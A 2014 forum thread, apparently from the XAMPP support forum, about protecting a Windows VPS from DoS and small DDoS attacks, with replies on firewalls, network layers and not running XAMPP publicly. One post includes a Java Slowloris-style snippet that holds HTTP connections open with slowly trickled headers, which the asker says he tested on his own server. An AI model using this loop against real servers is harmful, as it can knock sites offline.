Page 1 of 2

Protection for Dos and simple DDos attacks on Windows?

PostPosted: 12. February 2014 19:30
by Shackles
Hi, I know with just a script or mod I ain't going to stop a well done DDos attack. But there are ways to Stop DOS attacks y small DDOS attacks.

I tried on my server a small DOS attack (just from one IP), it shut it down in 10 seconds for about 5 minutes. I need to be protected at least from this.


My server info:
Managed VPS (I have admin access, and free to install anything)
Windows Server 2008
2048 mb RAM
1.000 mbps conection.


Thanks.

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 12. February 2014 20:27
by JJ_Tagy
This is beyond the scope of XAMPP. Your best bet is to look for hardware or other options.

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 12. February 2014 21:22
by Nobbie
As JJ_Tagy already pointed out, this is beyond the scope of Xampp.

I only want to clear it up more precisely:

A protection of DDOS attack is not a question of a(ny) Webserver, this is quite simply not the right "layer" fpr this kind of attack. IP and TCPIP is divided in several layers, the layer of a Webserver is by far to late. If your server really suffers from a DDOS attack, you have to answer this in the HIGHEST as possible layer of TCPIP, as a DDOS is independent from underlaying protocolls (like HTTP or FTP or similar).

It is at least a task of a local firewall and even in that case i have some bad news: a real real real DDOS attack is a pain and cannot be avoided, in the worst case there is no other solution than using a different IP for the attacked server. On the other hand, such hard DDOS attacks usually attacks famous servers, because there is no sense to attack a small private server with thousands and millions of (private) PCs. Even if this is possible - there is no sense in attacking small private servers.

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 12. February 2014 21:35
by Shackles
By Multy layering do you mean by:

DOMAIN NAME PROVIDER --> SERVER 1 --dns rule to --> SERVER 2 -- dns rule to --> SERVER 3 (real host)

In that case, even with a "PING DOMAIN NAME", would give me back IP server3 real host.

My idea is to stop a DOS attack at least, how would I start with that?

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 13. February 2014 01:24
by Altrea
Hi,

[INFO] How to not fail getting help here::Scope of support
DDos Attacks are not a problem for local test or development environments.

Everything else is said. It is not possible to prevent DDos attacks completely, you can only minimize the negative effects e.g. by load balancing between many many many servers and CDNs or by changing the request parameters (urls, ips). If you are interested in DDoS prevention ask a specialist. There are companies which are specialized in preventing attacks.

best wishes,
Altrea

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 13. February 2014 02:09
by Shackles
And for a simple DOS attack would mod_evasive and mod_security work?

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 13. February 2014 02:25
by Altrea
That depends on the attack. At the end preventing attacks is very inefficient if they have reached the webserver, so Apache modules are very inefficient too.
You will only be able to lower processing ressources a bit, nothing more.

But if you are using XAMPP in public accessible environments preventing DoS attacks would be your smallest problem.

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 13. February 2014 10:41
by Shackles
Excuse me for my ignorance on this part. But I have searched over the net desadvantages of using xampp in a public scope, but I find no problems.

I have deleted everything unneeded, just leaving apache, php & mysql.
And In the config I have removed quite a bit of xampps configuration.

What is so bad of using xampp on a public scope.


And back to my original question, so really nowadays, its not even worth to have mod_Evasive or mod_security installed?

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 13. February 2014 12:53
by Nobbie
Shackles wrote:By Multy layering do you mean by:


No. I mean the TCPIP layers resp. in an HTTP environment. I cannot explain this in a few words, but HTTP is a sophistic protocoll which is "pulled" over TCPIP and a DDOS attack does not (only) happen on HTTP level, but on TCPIP level.

Think of HTTP as car you wanna drive and TCPIP is the road you wanna use. What does it help to protect your car, if the road is destroyed?

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 13. February 2014 14:06
by Altrea
Shackles wrote:What is so bad of using xampp on a public scope.

XAMPP is configured for a specific purpose. That means it is not tweaked for performance, scalability, stability or security.
XAMPP components are coupled / integrated into each other so you cannot easily upgrade a single component of it to fix security holes.

If you have the knowledge to secure every single components feel free to do so.
But don't create any thread here that your XAMPP is hacked and how to fix that (internet is full of such posts).
We simply don't support XAMPP is such environments.

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 13. February 2014 14:13
by Shackles
Yes I get what you mean, even if I have software installed, if I have a strong MBps attack it will destroy the conection without even having to ask a firewall on my server.

Most servers arent protected by DDOS attacks due to that it is expensive. But there must be something like mod_evasive to stop a VERY VERY SMALL attack from a kid for instance.

My main issue right now is that I can run (i have done it) this java script:
Code: Select all
      Date localDate = new Date();
      long l = localDate.getTime();

      String str = "GET / HTTP/1.1\r\nHost: " + this.ip + "\r\n";
      str = str + "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
      str = str + "Content-Length: " + (int)(Math.random() * 1000.0D) + "\r\n";
      str = str + "X-a: " + (int)(Math.random() * 1000.0D) + "\r\n";

      Socket localSocket = new Socket(this.ip, this.port);
      BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localSocket.getInputStream()));
      BufferedWriter localBufferedWriter = new BufferedWriter(new OutputStreamWriter(localSocket.getOutputStream()));
      localBufferedWriter.write(str);
      localBufferedWriter.flush();

      while ((localSocket.isConnected()) && (this.timeLeft > 0))
      {
        System.out.print(".");
        localDate = new Date();
        this.timeLeft = ((int)(this.timeLeft - (localDate.getTime() - l)));

        localBufferedWriter.write("X-c:" + (int)(Math.random() * 1000.0D) + "\r\n");
        localBufferedWriter.flush();
        Thread.sleep((int)(Math.random() * 15000.0D));
      }

For 2 seconds at my IP:PORT (my conection isnt great), and it tears up my server...


@altrea:

What do you recommend me on a windows server? IIS7?

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 13. February 2014 14:28
by Nobbie
Shackles wrote:What do you recommend me on a windows server? IIS7?


Still Apache etc. - but not installed via Xampp, instead install Apache, PHP and MySQL separately. This gives you free maintenance and you may upgrade each component as you like.

One last word: i do not recommend Windows for that, I recommend Linux. All these tools are developed under Linux, they are well maintained under Linux, most WWW Servers are running a Linux (or BSD) Server and it gives you the opportunity to easily install from source code (if you need special modules etc.), as usually you may install the develoment environments for Apache etc. as well. And Linux (or BSD) are free and they run very stable.

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 13. February 2014 15:23
by Altrea
Shackles wrote:@altrea:

What do you recommend me on a windows server? IIS7?

I totally agree with Nobbies last post.
If you want to administrate your own Webserver you should have the knowledge how all of these components fit together (and installation and integration of these components is very easy on many linux distributions with help of their package managers)

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 13. February 2014 16:32
by Shackles
I agree with you too, for apache Linux systems are way better. But right know I need a windows server, mainly because I dont want to be running 2 servers (One Windows Server for the game server, and One Linux Server for the WebServer), for a smooth run of both features.

So you recomend me to install apache, php, mysql separatly. And this way if any security holes are patched, I can update easier.


A simple question about the Ddos again.
I dont want to have 2 keep moving servers, so is this posible:

-Keep my Windows VPS (Love its Speed, for the game server and webserver), with no DDOS detection.
-Contract a Linux VPS, to use as a Firewall for my Windows VPS.

Would that work for simple attacks?

Re: Protection for Dos and simple DDos attacks on Windows?

PostPosted: 13. February 2014 16:55
by Altrea
From your point of view: define "simple attacks"
We don't know anything about how you will implement the firewall and which type of firewall.
The answer is as always: it depends